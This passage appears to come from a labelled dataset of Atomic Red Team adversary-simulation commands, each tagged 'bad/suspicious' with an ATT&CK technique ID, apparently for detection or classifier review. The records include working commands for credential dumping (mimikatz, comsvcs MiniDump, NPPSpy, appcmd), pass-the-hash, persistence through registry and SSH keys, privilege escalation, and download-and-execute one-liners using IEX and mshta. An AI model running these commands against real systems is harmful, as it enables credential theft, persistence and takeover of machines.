https://github.com/tr4cefl0w/payloads/tree/master/T1547.003/ ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ea7c8cc0c5c655dd6237dc71,"net stop w32time Copy-Item ""$PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll"" C:\Users\Public\AtomicTest.dll reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer"" /t REG_SZ /v ""DllName"" /d ""C:\Users\Public\AtomicTest.dll"" /f reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer"" /t REG_DWORD /v ""Enabled"" /d ""1"" /f reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer"" /t REG_DWORD /v ""InputProvider"" /d ""1"" /f net start w32time","net stop w32time Copy-Item ""$PathToAtomicsFolder\T1547.003\bin\AtomicTest.dll"" C:\Users\Public\AtomicTest.dll reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer"" /t REG_SZ /v ""DllName"" /d ""C:\Users\Public\AtomicTest.dll"" /f reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer"" /t REG_DWORD /v ""Enabled"" /d ""1"" /f reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer"" /t REG_DWORD /v ""InputProvider"" /d ""1"" /f net start w32time",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.003/T1547.003.yaml,Edit an existing time provider,T1547.003,"[""T1547.003""]",windows,0.9,False,"Establishes persistence by editing the NtpServer time provider registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. The time provider will point to a DLL which will be loaded after the w32time service is started. The DLL will then create the file AtomicTest.txt in C:\Users\Public\ as validation that the test is successful. Payload source code: https://github.com/tr4cefl0w/payloads/tree/master/T1547.003/ ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d048602ab9a7d7f05a21c7f0,"net stop w32time reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer"" /t REG_SZ /v ""DllName"" /d ""C:\Windows\SYSTEM32\w32time.DLL"" /f reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer"" /t REG_DWORD /v ""Enabled"" /d ""0"" /f reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer"" /t REG_DWORD /v ""InputProvider"" /d ""0"" /f rm -force C:\Users\Public\AtomicTest.dll net start w32time","net stop w32time reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer"" /t REG_SZ /v ""DllName"" /d ""C:\Windows\SYSTEM32\w32time.DLL"" /f reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer"" /t REG_DWORD /v ""Enabled"" /d ""0"" /f reg add ""HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProviders\NtpServer"" /t REG_DWORD /v ""InputProvider"" /d ""0"" /f rm -force C:\Users\Public\AtomicTest.dll net start w32time",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1547.003/T1547.003.yaml,Edit an existing time provider,T1547.003,"[""T1547.003""]",windows,0.55,True,"Establishes persistence by editing the NtpServer time provider registry key under HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\W32Time\TimeProvider. The time provider will point to a DLL which will be loaded after the w32time service is started. The DLL will then create the file AtomicTest.txt in C:\Users\Public\ as validation that the test is successful. Payload source code: https://github.com/tr4cefl0w/payloads/tree/master/T1547.003/ ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 45808b09e2d6fd3331a74d49,"if [ -f ~/.ssh/authorized_keys ]; then ssh_authorized_keys=$(cat ~/.ssh/authorized_keys); echo ""$ssh_authorized_keys"" > ~/.ssh/authorized_keys; fi;","if [ -f ~/.ssh/authorized_keys ]; then ssh_authorized_keys=$(cat ~/.ssh/authorized_keys); echo ""$ssh_authorized_keys"" > ~/.ssh/authorized_keys; fi;",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1098.004/T1098.004.yaml,Modify SSH Authorized Keys,T1098.004,"[""T1098.004""]","linux,macos",0.9,False,"Modify contents of /.ssh/authorized_keys to maintain persistence on victim host. If the user is able to save the same contents in the authorized_keys file, it shows user can modify the file. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 18eef6849cff407cff7ca04f,unset ssh_authorized_keys,unset ssh_authorized_keys,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1098.004/T1098.004.yaml,Modify SSH Authorized Keys,T1098.004,"[""T1098.004""]","linux,macos",0.55,True,"Modify contents of /.ssh/authorized_keys to maintain persistence on victim host. If the user is able to save the same contents in the authorized_keys file, it shows user can modify the file. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 54f21e49eee299f07e58c7ce,"Install-TransportAgent -Name #{transport_agent_identity} -TransportAgentFactory #{class_factory} -AssemblyPath #{dll_path} Enable-TransportAgent #{transport_agent_identity} Get-TransportAgent | Format-List Name,Enabled","Install-TransportAgent -Name #{transport_agent_identity} -TransportAgentFactory #{class_factory} -AssemblyPath #{dll_path} Enable-TransportAgent #{transport_agent_identity} Get-TransportAgent | Format-List Name,Enabled",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1505.002/T1505.002.yaml,Install MS Exchange Transport Agent Persistence,T1505.002,"[""T1505.002""]",windows,0.9,False,"Install a Microsoft Exchange Transport Agent for persistence. This requires execution from an Exchange Client Access Server and the creation of a DLL with specific exports. Seen in use by Turla. More details- https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c9029d2fa2f7b31f8336e7e1,"if(Get-Command ""Get-TransportAgent"" -ErrorAction Ignore){ Disable-TransportAgent #{transport_agent_identity} Uninstall-TransportAgent #{transport_agent_identity} Get-TransportAgent }","if(Get-Command ""Get-TransportAgent"" -ErrorAction Ignore){ Disable-TransportAgent #{transport_agent_identity} Uninstall-TransportAgent #{transport_agent_identity} Get-TransportAgent }",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1505.002/T1505.002.yaml,Install MS Exchange Transport Agent Persistence,T1505.002,"[""T1505.002""]",windows,0.55,True,"Install a Microsoft Exchange Transport Agent for persistence. This requires execution from an Exchange Client Access Server and the creation of a DLL with specific exports. Seen in use by Turla. More details- https://docs.microsoft.com/en-us/exchange/transport-agents-exchange-2013-help ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f80332b314e28ec2e959e77b,"""#{gsecdump_exe}"" -a","""#{gsecdump_exe}"" -a",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1003/T1003.yaml,Gsecdump,T1003,"[""T1003""]",windows,0.9,False,"Dump credentials from memory using Gsecdump. Upon successful execution, you should see domain\username's followed by two 32 character hashes. If you see output that says ""compat: error: failed to create child process"", execution was likely blocked by Anti-Virus. You will receive only error output if you do not run this test from an elevated context (run as administrator) If you see a message saying ""The system cannot find the path specified"", try using the get-prereq_commands to download and",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review cbaf0de14dcd984dc125ec9b,"$cleanupPath = Get-ItemProperty -Path ""HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order"" -Name PROVIDERORDER $cleanupUpdatedValue = $cleanupPath.PROVIDERORDER $cleanupUpdatedValue = $cleanupUpdatedValue -replace ',NPPSpy','' Set-ItemProperty -Path $cleanupPath.PSPath -Name ""PROVIDERORDER"" -Value $cleanupUpdatedValue Remove-Item -Path ""HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy"" -Recurse -ErrorAction Ignore Remove-Item C:\NPPSpy.txt -ErrorAction Ignore Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore","$cleanupPath = Get-ItemProperty -Path ""HKLM:\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order"" -Name PROVIDERORDER $cleanupUpdatedValue = $cleanupPath.PROVIDERORDER $cleanupUpdatedValue = $cleanupUpdatedValue -replace ',NPPSpy','' Set-ItemProperty -Path $cleanupPath.PSPath -Name ""PROVIDERORDER"" -Value $cleanupUpdatedValue Remove-Item -Path ""HKLM:\SYSTEM\CurrentControlSet\Services\NPPSpy"" -Recurse -ErrorAction Ignore Remove-Item C:\NPPSpy.txt -ErrorAction Ignore Remove-Item C:\Windows\System32\NPPSpy.dll -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1003/T1003.yaml,Credential Dumping with NPPSpy,T1003,"[""T1003""]",windows,0.55,True,"Changes ProviderOrder Registry Key Parameter and creates Key for NPPSpy. After user's logging in cleartext password is saved in C:\NPPSpy.txt. Clean up deletes the files and reverses Registry changes. NPPSpy Source: https://github.com/gtworek/PSBits/tree/master/PasswordStealing/NPPSpy",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 4682ee95fbb40050ab849829,"$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore) if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id } C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full","$ps = (Get-NetTCPConnection -LocalPort 3389 -State Established -ErrorAction Ignore) if($ps){$id = $ps[0].OwningProcess} else {$id = (Get-Process svchost)[0].Id } C:\Windows\System32\rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump $id $env:TEMP\svchost-exe.dmp full",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1003/T1003.yaml,Dump svchost.exe to gather RDP credentials,T1003,"[""T1003""]",windows,0.9,False,"The svchost.exe contains the RDP plain-text credentials. Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/ Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 8e4716152d4a715178d6e782,Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore,Remove-Item $env:TEMP\svchost-exe.dmp -ErrorAction Ignore,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1003/T1003.yaml,Dump svchost.exe to gather RDP credentials,T1003,"[""T1003""]",windows,0.55,True,"The svchost.exe contains the RDP plain-text credentials. Source: https://www.n00py.io/2021/05/dumping-plaintext-rdp-credentials-from-svchost-exe/ Upon successful execution, you should see the following file created $env:TEMP\svchost-exe.dmp. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1bbb23f112616010dbb5bf58,C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:* C:\Windows\System32\inetsrv\appcmd.exe list apppool /@text:* C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*,C:\Windows\System32\inetsrv\appcmd.exe list apppool /@t:* C:\Windows\System32\inetsrv\appcmd.exe list apppool /@text:* C:\Windows\System32\inetsrv\appcmd.exe list apppool /text:*,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1003/T1003.yaml,Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using list),T1003,"[""T1003""]",windows,0.9,False,"AppCmd.exe is a command line utility which is used for managing an IIS web server. The list command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes. [Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 98e11c2cea9e265ccc78c8c0,C:\Windows\System32\inetsrv\appcmd.exe list apppool /config,C:\Windows\System32\inetsrv\appcmd.exe list apppool /config,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1003/T1003.yaml,Retrieve Microsoft IIS Service Account Credentials Using AppCmd (using config),T1003,"[""T1003""]",windows,0.9,False,"AppCmd.exe is a command line utility which is used for managing an IIS web server. The config command within the tool reveals the service account credentials configured for the webserver. An adversary may use these credentials for other malicious purposes. [Reference](https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA)",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ebb698f2f62eed0a7186032c,"rundll32.exe keymgr,KRShowKeyMgr","rundll32.exe keymgr,KRShowKeyMgr",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1003/T1003.yaml,Dump Credential Manager using keymgr.dll and rundll32.exe,T1003,"[""T1003""]",windows,0.9,False,"This test executes the exported function `KRShowKeyMgr` located in `keymgr.dll` using `rundll32.exe`. It opens a window that allows to export stored Windows credentials from the credential manager to a file (`.crd` by default). The file can then be retrieved and imported on an attacker-controlled computer to list the credentials get the passwords. The only limitation is that it requires a CTRL+ALT+DELETE input from the attacker, which can be achieve multiple ways (e.g. a custom implant with remo",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 68d98b8edeed8121c65c63d4,rpcping -s #{server_ip} -e #{custom_port} -a privacy -u NTLM 1>$Null,rpcping -s #{server_ip} -e #{custom_port} -a privacy -u NTLM 1>$Null,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1003/T1003.yaml,Send NTLM Hash with RPC Test Connection,T1003,"[""T1003""]",windows,0.9,False,"RpcPing command can be used to send an RPC test connection to the target server (-s) and force the NTLM hash to be sent in the process. Ref: https://twitter.com/vysecurity/status/974806438316072960",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 625413e30991932171d54cfc,"#{mimikatz_path} ""sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}""","#{mimikatz_path} ""sekurlsa::pth /user:#{user_name} /domain:#{domain} /ntlm:#{ntlm}""",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1550.002/T1550.002.yaml,Mimikatz Pass the Hash,T1550.002,"[""T1550.002""]",windows,0.9,False,"Note: must dump hashes first [Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth) ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review c510d3e8711ad8ba24ed7b74,#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command},#{crackmapexec_exe} #{domain} -u #{user_name} -H #{ntlm} -x #{command},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1550.002/T1550.002.yaml,crackmapexec Pass the Hash,T1550.002,"[""T1550.002""]",windows,0.9,False,"command execute with crackmapexec ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 966aca7a4884782107cb5708,[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command #{command},[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/Kevin-Robertson/Invoke-TheHash/01ee90f934313acc7d09560902443c18694ed0eb/Invoke-WMIExec.ps1' -UseBasicParsing);Invoke-WMIExec -Target #{target} -Username #{user_name} -Hash #{ntlm} -Command #{command},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1550.002/T1550.002.yaml,Invoke-WMIExec Pass the Hash,T1550.002,"[""T1550.002""]",windows,0.9,False,"Use Invoke-WMIExec to Pass the Hash Note: must dump hashes first [Reference](https://github.com/gentilkiwi/mimikatz/wiki/module-~-sekurlsa#pth)",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 30cf6324b1e8d332b89446ec,[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose,[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique NamedPipe -Verbose,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1134.001/T1134.001.yaml,Named pipe client impersonation,T1134.001,"[""T1134.001""]",windows,0.9,False,"Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script creates a named pipe, and a service that writes to that named pipe. When the service connects to the named pipe, the script impersonates its security context. When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM). Reference: https://blog.cobaltstrike.com/2014/04/02/what-happens-when-i",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 24cfb343d5a1b2302cba88f8,[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose,[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 IEX (IWR 'https://raw.githubusercontent.com/BC-SECURITY/Empire/f6efd5a963d424a1f983d884b637da868e5df466/data/module_source/privesc/Get-System.ps1' -UseBasicParsing); Get-System -Technique Token -Verbose,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1134.001/T1134.001.yaml,`SeDebugPrivilege` token duplication,T1134.001,"[""T1134.001""]",windows,0.9,False,"Uses PowerShell and Empire's [GetSystem module](https://github.com/BC-SECURITY/Empire/blob/v3.4.0/data/module_source/privesc/Get-System.ps1). The script uses `SeDebugPrivilege` to obtain, duplicate and impersonate the token of a another process. When executed successfully, the test displays the domain and name of the account it's impersonating (local SYSTEM).",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 255c783493e410e413d78814,"Start-Process ""#{nsudo_path}"" -Argument ""-U:T -P:E cmd"" Start-Sleep -Second 5 Stop-Process -Name ""cmd"" -force -erroraction silentlycontinue","Start-Process ""#{nsudo_path}"" -Argument ""-U:T -P:E cmd"" Start-Sleep -Second 5 Stop-Process -Name ""cmd"" -force -erroraction silentlycontinue",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1134.001/T1134.001.yaml,Launch NSudo Executable,T1134.001,"[""T1134.001""]",windows,0.9,False,"Launches the NSudo executable for a short period of time and then exits. NSudo download observed after maldoc execution. NSudo is a system management tool for advanced users to launch programs with full privileges.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review ec71031fc480f81ce1d4c0c5,"cd ""PathToAtomicsFolder\..\ExternalPayloads"" Start-Process .\BadPotato.exe notepad.exe Start-Sleep -Second 20 Stop-Process -Name ""notepad"" -force -erroraction silentlycontinue Stop-Process -Name ""BadPotato"" -force -erroraction silentlycontinue","cd ""PathToAtomicsFolder\..\ExternalPayloads"" Start-Process .\BadPotato.exe notepad.exe Start-Sleep -Second 20 Stop-Process -Name ""notepad"" -force -erroraction silentlycontinue Stop-Process -Name ""BadPotato"" -force -erroraction silentlycontinue",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1134.001/T1134.001.yaml,Bad Potato,T1134.001,"[""T1134.001""]",windows,0.9,False,"https://github.com/BeichenDream/BadPotato Privilege escalation using named pipe connections",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d4a74a478f29c4d28fb4bfc4,taskkill /f /im notepad.exe,taskkill /f /im notepad.exe,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1134.001/T1134.001.yaml,Bad Potato,T1134.001,"[""T1134.001""]",windows,0.55,True,"https://github.com/BeichenDream/BadPotato Privilege escalation using named pipe connections",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f2959a7af77a6bf692cc6656,cmd /c '#{potato_path}' -l '#{listening_port}' -t * -p '#{target_exe}' -c '#{target_CLSID}',cmd /c '#{potato_path}' -l '#{listening_port}' -t * -p '#{target_exe}' -c '#{target_CLSID}',bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1134.001/T1134.001.yaml,Juicy Potato,T1134.001,"[""T1134.001""]",windows,0.9,False,"This Atomic utilizes Juicy Potato to obtain privilege escalation. Upon successful execution of this test, a vulnerable CLSID will be used to execute a process with system permissions. This tactic has been previously observed in SnapMC Ransomware, amongst numerous other campaigns. [Reference](https://blog.fox-it.com/2021/10/11/snapmc-skips-ransomware-steals-data/)",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 7a2c928727afde4593068fb7,"get-ciminstance Win32_Process | where-object { $_.Path -eq ""#{target_exe}"" } | invoke-cimmethod -methodname ""terminate"" | out-null get-ciminstance Win32_Process | where-object { $_.Path -eq ""#{potato_path}"" } | invoke-cimmethod -methodname ""terminate"" | out-null","get-ciminstance Win32_Process | where-object { $_.Path -eq ""#{target_exe}"" } | invoke-cimmethod -methodname ""terminate"" | out-null get-ciminstance Win32_Process | where-object { $_.Path -eq ""#{potato_path}"" } | invoke-cimmethod -methodname ""terminate"" | out-null",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1134.001/T1134.001.yaml,Juicy Potato,T1134.001,"[""T1134.001""]",windows,0.55,True,"This Atomic utilizes Juicy Potato to obtain privilege escalation. Upon successful execution of this test, a vulnerable CLSID will be used to execute a process with system permissions. This tactic has been previously observed in SnapMC Ransomware, amongst numerous other campaigns. [Reference](https://blog.fox-it.com/2021/10/11/snapmc-skips-ransomware-steals-data/)",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review d8cfaf42e28362fbf79c1f91,mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();,mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218.005/T1218.005.yaml,Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject,T1218.005,"[""T1218.005""]",windows,0.9,False,"Test execution of a remote script using mshta.exe. Upon execution calc.exe will be launched. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review eab2c1dc59b3c29fe97e4386,"mshta vbscript:Execute(""CreateObject(""""Wscript.Shell"""").Run """"powershell -noexit -file PathToAtomicsFolder\T1218.005\src\powershell.ps1"""":close"")","mshta vbscript:Execute(""CreateObject(""""Wscript.Shell"""").Run """"powershell -noexit -file PathToAtomicsFolder\T1218.005\src\powershell.ps1"""":close"")",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218.005/T1218.005.yaml,Mshta executes VBScript to execute malicious command,T1218.005,"[""T1218.005""]",windows,0.9,False,"Run a local VB script to run local user enumeration powershell command. This attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems. Upon execution, a new PowerShell windows will be opened that displays user information. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0490502cf354a96534bf4953,"$var =Invoke-WebRequest ""#{hta_url}"" $var.content|out-file ""#{temp_file}"" mshta ""#{temp_file}"" start-sleep -s 15 stop-process -name ""calculator"" -Force -ErrorAction Ignore stop-process -name ""CalculatorApp"" -Force -ErrorAction Ignore","$var =Invoke-WebRequest ""#{hta_url}"" $var.content|out-file ""#{temp_file}"" mshta ""#{temp_file}"" start-sleep -s 15 stop-process -name ""calculator"" -Force -ErrorAction Ignore stop-process -name ""CalculatorApp"" -Force -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218.005/T1218.005.yaml,Mshta Executes Remote HTML Application (HTA),T1218.005,"[""T1218.005""]",windows,0.9,False,"Execute an arbitrary remote HTA. Upon execution calc.exe will be launched. ",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 0ae16c4a160cc908053f81f3,"remove-item ""#{temp_file}"" -ErrorAction Ignore","remove-item ""#{temp_file}"" -ErrorAction Ignore",bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218.005/T1218.005.yaml,Mshta Executes Remote HTML Application (HTA),T1218.005,"[""T1218.005""]",windows,0.55,True,"Execute an arbitrary remote HTA. Upon execution calc.exe will be launched. ",unreviewed,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 5cc25339cceca1298709b983,Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath #{mshta_file_path},Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath #{mshta_file_path},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218.005/T1218.005.yaml,Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement,T1218.005,"[""T1218.005""]",windows,0.9,False,Executes an HTA Application using JScript script engine using local UNC path simulating lateral movement.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review cdc67d9b2a71aa94afe837b4,Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -SimulateUserDoubleClick,Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -SimulateUserDoubleClick,bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218.005/T1218.005.yaml,Invoke HTML Application - Jscript Engine Simulating Double Click,T1218.005,"[""T1218.005""]",windows,0.9,False,Executes an HTA Application using JScript script engine simulating double click.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 1c37a96f00b81725af317a3a,Invoke-ATHHTMLApplication -HTAUri #{hta_uri} -MSHTAFilePath #{mshta_file_path},Invoke-ATHHTMLApplication -HTAUri #{hta_uri} -MSHTAFilePath #{mshta_file_path},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218.005/T1218.005.yaml,Invoke HTML Application - Direct download from URI,T1218.005,"[""T1218.005""]",windows,0.9,False,Executes an HTA Application by directly downloading from remote URI.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review f6f68912d04b9a9fab56f4d4,Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -UseRundll32 -Rundll32FilePath #{rundll32_file_path},Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -UseRundll32 -Rundll32FilePath #{rundll32_file_path},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218.005/T1218.005.yaml,Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler,T1218.005,"[""T1218.005""]",windows,0.9,False,"Executes an HTA Application with JScript Engine, Rundll32 and Inline Protocol Handler.",primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review 648ff4ab0f3c65936b48d143,Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -MSHTAFilePath #{mshta_file_path},Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -MSHTAFilePath #{mshta_file_path},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218.005/T1218.005.yaml,Invoke HTML Application - JScript Engine with Inline Protocol Handler,T1218.005,"[""T1218.005""]",windows,0.9,False,Executes an HTA Application with JScript Engine and Inline Protocol Handler.,primary,,False,,2026-04-02T03:20:35.658034+00:00,review_queue,review deefd64584cc989bb27f33f4,Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath #{mshta_file_path},Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath #{mshta_file_path},bad,bad,plain,suspicious,adversary_simulation,atomic_red_team,redcanaryco/atomic-red-team,atomics/T1218.005/T1218.005.yaml,Invoke HTML Application - Simulate Lateral Movement over UNC Path,T1218.005,"[""T1218.005""]",windows,0.9,False,Executes an HTA Application with Simulate lateral movement over UNC 